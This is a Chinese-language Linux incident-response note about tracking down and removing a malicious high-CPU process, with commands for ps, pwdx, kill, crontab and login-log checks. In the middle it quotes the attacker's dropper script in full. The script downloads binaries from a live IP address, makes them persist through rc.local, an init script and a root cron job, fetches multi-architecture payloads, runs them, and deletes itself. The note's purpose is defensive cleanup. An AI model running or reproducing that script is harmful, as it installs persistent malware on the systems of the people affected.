#1.输入top命令，输入shift + P会按照cpu的使用率大小从大到小进行排序，cpu使用率高的就是可疑进程。
top
#2.查看运行该进程的命令
ps -ef | grep PID

#1.查看进程运行目录
pwdx PID
#2.进入目录
cd dir

/proc/pid/exe文件是一个符号链接文件，它的内容是一个指向当前进程可执行文件的绝对路径的符号链接。

sudo kill -9 pid

#1.查看进程运行目录
pwdx PID
#2.进入目录
cd dir
#3.查看最近两天修改的文件
find . -type f -mtime -2

#!/bin/bash
cd /var/run;wget -O localn http://20.239.92.233/localn;curl -o localn http://20.239.92.233/localn;chmod +x /var/run/localn
cd /mnt;wget -O localn http://20.239.92.233/localn;curl -o localn http://20.239.92.233/localn;chmod +x /mnt/localn
cd /;wget -O systemn http://20.239.92.233/systemn;curl -o systemn http://20.239.92.233/systemn;chmod +x /systemn
chmod +x /etc/rc.d/rc.local
chmod +x /etc/init.d/network
chmod +x /etc/crontab
echo "/var/run/localn &" >> /etc/rc.d/rc.local
if [ ! -f "/etc/init.d/network" ]; thenecho "sh /mnt/localn" | tee /etc/init.d/networkchmod +x /etc/init.d/network
elsesed -i '15i sh /mnt/localn' /etc/init.d/network
fi
echo "* * * * * /systemn &" >> /var/spool/cron/root
files="x86_64 mips mpsl arm arm5 arm6 arm7 m68k sh4 ppc aarch64"
cd /tmp
for file in $files
dowget http://20.239.92.233/skl.$filewget http://20.239.92.233/skl.$file -O skl.$filechmod +x skl.$file./skl.$file $file
done
rm -rf $0

sudo rm -rf skdl.sh

#1.查看定时任务列表
crontab -l
#2.如果出现可疑定时任务，就注释掉
crontab -e
#3.查看开机自启动的内容，如果有可疑内容就注释掉
cat /etc/rc.local

#查看用户登录日志
last

查看ssh登录日志